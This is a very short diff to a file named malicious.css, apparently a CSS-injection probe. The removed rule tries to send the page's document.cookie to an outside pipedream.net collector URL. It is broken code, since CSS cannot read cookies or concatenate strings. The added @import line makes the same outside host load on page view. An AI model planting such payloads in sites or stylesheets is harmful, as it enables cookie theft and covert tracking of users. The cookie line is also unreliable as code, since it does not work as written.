--- a/malicious.css
+++ b/malicious.css
@@ -1,3 +1,1 @@
-body {
-  background-image: url("https://eo10sr0fi9sxhnf.m.pipedream.net/log?cookie=" + document.cookie);
-}
+@import url("https://eo10sr0fi9sxhnf.m.pipedream.net");
